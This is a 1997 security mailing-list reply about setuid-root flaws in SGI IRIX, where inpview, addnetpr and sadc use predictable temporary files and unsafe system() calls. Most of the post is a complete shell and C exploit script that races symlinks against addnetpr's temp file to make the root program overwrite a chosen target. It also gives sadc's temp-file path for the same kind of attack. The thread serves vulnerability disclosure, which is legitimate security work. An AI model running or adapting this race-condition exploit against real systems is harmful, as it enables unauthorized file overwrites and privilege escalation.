Re: Irix: misc

Jaechul Choe (poison@COSMOS.KAIST.AC.KR)
Fri, 09 May 1997 06:33:46 +0900

Wow, your works are so fertile and wonderful.
Let me add some stuffs

>
>
> 1. /usr/lib/InPerson/inpview
>
> inpview is part of InPerson desktop video conferencing package. It's
> root-owned/suid and is written in a classic SGI suid-programming style, i.e.
> in the course of execution inpview, without dropping euid=0, starts program
> ttsession, using system() and without bothering to use absolute path. So
> it's pretty much like suid shell sitting around, in case you forget root
> password. It does all kinds of other dangerous stuff as well, e.g.
> predictable tmp files.
>

The template for one of the tmp files is "/var/tmp/ioAAAXXXXXX"
I was trying to write a script exploiting the race condition, last year
, but for some reason I couldn't know then, the race didn't run well and I
quitted soon.

There was the same race condition in the program, /usr/lib/addnetpr, another
suid root program for print.
Here is the exploit script for it.
But though I tried, it was hard to find the way to get root with it.
It can fill the target with the two argument of addnetpr, but with some
messages unable to control.
And it will prompt the window asking root passwd to non-privilegedd(not root,
but irix-specific privileged) users.
Privileged users bypass the window and can run the race.

Tested both IRIX 5.3 and 6.2

---------------)<-----------cut expnetpr.sh ---------------)<----------------

#!/bin/sh

PROG="`basename $0`"
if [ $# -ne 1 ]; then
echo "Usage: $PROG <target>"
exit 1
fi

cat > expnetpr.c << _CREDIT_TO_ZOMO_
void main(int argc, char *argv[])
{
char *template = "/var/tmp/printersXXXXXX";
char *target;
int pid;

target = (char *)mktemp(template);

if ((pid = fork()) > 0) {
sleep(3);
umask(0);
execl("/usr/lib/addnetpr", "addnetpr", "localhost","+", 0);
}
else
while(1) {
symlink(argv[1], target);
unlink(target);
}

}
_CREDIT_TO_ZOMO_

/bin/cc expnetpr.c -o expnetpr
if [ ! -f expnetpr ]; then
echo "Couldn't compile expnetpr.c, lame! \nMake sure that C compiler has
been installed from the IDO"
exit 1
fi

while(`true`)
do
./expnetpr $1&
PID=$!
sleep 15
ls -al $1
killall expnetpr
killall addnetpr
done

--------------------)<------------ cut ---------------)<-------------------

And one more, as addressed in [8lgm]-Advisory-11.UNIX.sadc.07-Jan-1992
and SGI security FAQ, there is a hole in /usr/lib/sa/sadc.
That's both on IRIX 5.3 and 6.2.
The tmp file to link to target is /tmp/sa_adrfl
(
114mS stat(/tmp/sa.adrfl, 0x10042dd8) errno = 2 (No such file or directory)
115mS umask(0) = 0
116mS open(/tmp/sa.adrfl, O_RDWR|O_CREAT|O_TRUNC, 0664) = 3
)
sadc is sgid sys in IRIX so the hole may be minor
but won't it be of help to get root in conjunction with another program?
I was surprised to find the hole still existed in IRIX 6.2 then
SGI might be indifferent enough